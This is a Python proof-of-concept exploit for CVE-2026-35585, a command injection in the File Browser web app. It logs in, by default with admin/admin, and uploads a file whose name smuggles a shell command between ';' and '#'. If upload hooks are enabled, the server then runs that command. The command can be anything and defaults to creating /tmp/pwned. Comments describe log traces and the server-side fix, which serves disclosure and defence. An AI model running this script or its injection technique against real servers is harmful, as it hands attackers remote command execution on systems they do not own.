import requests
import argparse
import sys
import urllib.parse
# -------------------------------------------------------------------------
# CVE-2026-35585: File Browser OS Command Injection PoC
# This script is for educational purposes only.
# -------------------------------------------------------------------------
def get_args():
    """Parse the PoC's command-line options from ``sys.argv``.

    Returns:
        An ``argparse.Namespace`` with ``target`` (required base URL),
        ``user`` and ``password`` (both default to ``admin``) and
        ``command`` (the string embedded in the uploaded file name;
        defaults to ``touch /tmp/pwned``, which only creates a marker file).
    """
    cli = argparse.ArgumentParser(description="PoC for CVE-2026-35585 (File Browser RCE)")

    # One row per option: (flags, keyword arguments for add_argument).
    option_table = (
        (("-t", "--target"), {"required": True, "help": "Target URL (e.g., http://localhost:8080)"}),
        # The defaults below are admin/admin; an instance that still accepts
        # them is exposed to any authenticated-only issue, this one included.
        (("-u", "--user"), {"default": "admin", "help": "Username"}),
        (("-p", "--password"), {"default": "admin", "help": "Password"}),
        (("-c", "--command"), {"default": "touch /tmp/pwned", "help": "Command to execute"}),
    )
    for flags, settings in option_table:
        cli.add_argument(*flags, **settings)

    return cli.parse_args()
def exploit():
    """Run the CVE-2026-35585 proof of concept against the configured target.

    Steps, as implemented below:
      1. Log in through ``/api/login`` and attach the returned token to the
         session as the ``X-Auth`` header.
      2. Build a file name of the form ``; <command> #`` and percent-encode it.
      3. POST a small body to ``/api/resources/<encoded name>``.

    The function prints progress and returns ``None``. It never confirms that
    the command ran: a 200 response only shows the upload was accepted.
    Whether anything executes depends on the server having command hooks
    enabled, as the final status message states.

    Defensive reading: the request needs a valid login, and its trace in
    access logs is an upload path under ``/api/resources/`` whose decoded
    name contains shell metacharacters such as ``;`` and ``#``.
    """
    opts = get_args()
    root = opts.target.rstrip('/')
    http = requests.Session()
    print(f"[*] Targeting: {root}")

    # --- Step 1: authenticate --------------------------------------------
    credentials = {"username": opts.user, "password": opts.password}
    try:
        print("[*] Attempting to login...")
        login_resp = http.post(f"{root}/api/login", json=credentials)
        if login_resp.status_code != 200:
            print(f"[-] Login failed (Status: {login_resp.status_code}). Check credentials.")
            return
        # Per the original author's note, File Browser returns the JWT as a
        # quoted string, so the surrounding double quotes are stripped.
        jwt = login_resp.text.strip('"')
        http.headers.update({"X-Auth": jwt})
        print("[+] Login successful.")
    except Exception as e:
        print(f"[-] Error during login: {e}")
        return

    # --- Step 2: build the file name --------------------------------------
    # The name wraps the command between ';' and '#'. The issue demonstrated
    # is a file name reaching a shell command line unescaped, so the
    # server-side fix is to stop passing names to a shell or to escape or
    # reject metacharacters.
    payload_filename = "; " + opts.command + " #"
    # safe='' also encodes '/', keeping the whole name in one path segment.
    upload_url = root + "/api/resources/" + urllib.parse.quote(payload_filename, safe='')

    # --- Step 3: send the upload ------------------------------------------
    try:
        print(f"[*] Triggering RCE by uploading file: '{payload_filename}'")
        print(f"[*] Encoded URL: {upload_url}")
        # The original note says an empty file is enough to fire the
        # 'after_upload' hook; a short fixed body is sent here regardless.
        upload_resp = http.post(upload_url, data="poc_content")
        if upload_resp.status_code != 200:
            print(f"[-] Upload failed (Status: {upload_resp.status_code}).")
            print(" Note: Some characters might be blocked if 'Filename validation' is active.")
        else:
            print("[+] Upload request successful.")
            print(f"[!] Command '{opts.command}' should have been executed if hooks are enabled.")
    except Exception as e:
        print(f"[-] Error during exploit: {e}")
# Script entry point: the PoC runs only when this file is executed directly,
# never as a side effect of importing it.
if __name__ == "__main__":
    exploit()